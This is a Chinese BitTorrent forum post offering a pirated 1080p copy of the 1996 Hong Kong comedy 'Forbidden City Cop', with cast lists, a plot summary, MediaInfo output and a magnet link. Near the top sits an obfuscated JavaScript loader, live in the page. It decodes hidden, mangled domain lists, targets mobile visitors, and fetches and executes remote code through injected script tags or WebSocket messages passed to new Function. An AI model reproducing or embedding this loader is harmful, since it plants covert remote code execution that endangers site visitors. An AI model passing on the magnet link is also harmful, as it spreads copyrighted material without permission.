大内密探零零发[国粤语音轨/中文字幕].Forbidden.City.Cop.1996.1080p.迅雷下载 6.92GB

版主小s 26天前 314

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 大内密探零零发 / 鹿鼎大帝(台) / Forbidden City Cop / Dai lap mat tam 008

◎片 名 大內密探零零發

◎年 代 1996

◎产 地 中国香港

◎类 别 喜剧 / 动作 / 爱情 / 古装

◎语 言 粤语

◎上映日期 1996-02-16(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0116014/

◎豆瓣评分 7.9/10 (316345人评价)

◎豆瓣链接 https://movie.douban.com/subject/1329936/

◎片 长 89分钟

◎导 演 谷德昭 Vincent Kok (id:1025526)

周星驰 Stephen Chow (id:1048026)

◎编 剧 劳文生 Man Sang Lo (id:1322128)

谷德昭 Vincent Kok (id:1025526)

周星驰 Stephen Chow (id:1048026)

◎演 员 周星驰 Stephen Chow (id:1048026)

刘嘉玲 Carina Lau (id:1036905)

李若彤 Carman Lee (id:1023476)

罗家英 Kar-Ying Law (id:1108968)

张达明 Tat-Ming Cheung (id:1274433)

刘以达 Tats Lau (id:1034328)

李力持 Lik-Chi Lee (id:1274246)

江欣燕 Elvina Kong (id:1104138)

苑琼丹 King-Tan Yuen (id:1274445)

朱咪咪 Mimi Chu (id:1275715)

李健仁 Kin-Yan Lee (id:1315575)

袁祥仁 Cheung-Yan Yuen (id:1301574)

袁信义 Shun-Yee Yuen (id:1301576)

植敬雯 King-Man Chik (id:1315881)

潘恒生 Hang-Sang Poon (id:1294721)

谷德昭 Vincent Kok (id:1025526)

文隽 Manfred Wong (id:1274823)

黄老邪 Quinton Wong (id:1345683)

黄一飞 Yut Fei Wong (id:1301215)

查尔斯·沈 Charles Shen (id:1345685)

吴育枢 Jackson Ng Yuk-Sue (id:1361260)

王均康 Kwan Hong Wong (id:1358028)

陈剑云 Kim-Wan Chan (id:1361831)

欧锦棠 Stephen Au (id:1275712)

叶伟信 Wilson Yip (id:1274472)

黄志强 Kirk Wong (id:1301193)

英德拉·利奇 Indra Leech (id:1345681)

王英杰 Ying Git Wong (id:1342034)

黄智强 Ji Keung Wong (id:1431206)

谭镇渡 Tony Tam Chun-To (id:1417488)

王晶 Jing Wong (id:1274331)

向华强 Charles Heung (id:1037691)

馮鳳珍 Rita Fung (id:1441554)

刘以达 Tats Lau (id:1034328)

顾嘉辉 Joseph Koo (id:1017256)

商易 Yi Shang (id:1414560)

邝志良 Chi-Leung Kwong (id:1289164)

何剑雄 Cyrus Ho (id:1286709)

刘嘉玲 Carina Lau (id:1036905)

张叔平 William Chang (id:1274369)

张世宏 Silver Cheung (id:1318916)

关莉娜 Lee-na Kwan (id:1289154)

田启文 Kai Man Tin (id:1315882)

梁力之 Lik-Chi Leung (id:1433564)

◎标 签 喜剧 / 香港 / 搞笑 / 星爷 / 经典 / 无厘头 / 古装 / 1996

◎简 介

零零恭、零零喜、零零发(周星驰饰)、零零财是宫廷四大高手,专职保卫皇帝(张达明饰)的安全。虽号称四大高手之一,零零发实际上只会搞些小发明完全不会武功,某次因为未完成皇帝交办的捉拿江湖四大怪杰的任务,他被开除出宫。回家后,零零发开了一家妇科诊所,时常会用一些小发明讨得老婆(刘嘉玲饰)心花怒放,日子也算怡然自乐。金国以“天外飞仙”尸体为由将皇帝从宫中骗出,并伺机杀死了紧跟皇帝的三大高手,关键时刻,零零发用他发明的“直升机”和“机关枪”救皇帝一命。不死心的敌手随后派来名妓琴操(李若彤饰)引诱零零发,零零发与老婆将计就计演起双簧。

  1. General

  2. Unique ID : 177627539555722212228312389160811840155 (0x85A1D1DA567573EB22CC4E249D6F429B)

  3. Complete name : Forbidden.City.Cop.1996.1080p.BluRay.DTS.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.92 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate : 11.1 Mb/s

  9. Movie name : Forbidden City Cop 1996 1080p BluRay DTS 2Audio x265-10bit-HDS

  10. Encoded date : UTC 2021-06-29 04:34:10

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 29 min

  20. Bit rate : 8 893 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.179

  30. Stream size : 5.55 GiB (80%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Encoding settings : lslices=4 / deblock(tC=-1:B=-1)

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 29 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 964 MiB (14%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No


  55. Audio #2

  56. ID : 3

  57. Format : AC-3

  58. Format/Info : Audio Coding 3

  59. Commercial name : Dolby Digital

  60. Codec ID : A_AC3

  61. Duration : 1 h 29 min

  62. Bit rate mode : Constant

  63. Bit rate : 640 kb/s

  64. Channel(s) : 6 channels

  65. Channel layout : L R C LFE Ls Rs

  66. Sampling rate : 48.0 kHz

  67. Frame rate : 31.250 FPS (1536 SPF)

  68. Compression mode : Lossy

  69. Stream size : 409 MiB (6%)

  70. Title : Mandarin

  71. Language : Chinese

  72. Service kind : Complete Main

  73. Default : No

  74. Forced : No


  75. Text #1

  76. ID : 4

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 26 min

  82. Bit rate : 46.8 kb/s

  83. Count of elements : 2688

  84. Stream size : 29.1 MiB (0%)

  85. Title : CHT

  86. Language : Chinese

  87. Default : Yes

  88. Forced : No


  89. Text #2

  90. ID : 5

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 27 min

  96. Bit rate : 31.8 kb/s

  97. Count of elements : 2536

  98. Stream size : 20.0 MiB (0%)

  99. Title : CHS

  100. Language : Chinese

  101. Default : No

  102. Forced : No


  103. Menu

  104. 00:00:00.000 : en:Chapter 01

  105. 00:06:36.438 : en:Chapter 02

  106. 00:13:48.619 : en:Chapter 03

  107. 00:22:21.423 : en:Chapter 04

  108. 00:28:52.689 : en:Chapter 05

  109. 00:36:54.629 : en:Chapter 06

  110. 00:43:24.602 : en:Chapter 07

  111. 00:49:53.365 : en:Chapter 08

  112. 00:55:30.327 : en:Chapter 09

  113. 01:03:38.857 : en:Chapter 10

  114. 01:13:21.314 : en:Chapter 11

  115. 01:19:50.995 : en:Chapter 12


TAGS 动作 喜剧 古装 爱情

磁力链:
  • magnet:?xt=urn:btih:6F33BC49481064D65040EA38E842F7FC3035F5AD
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回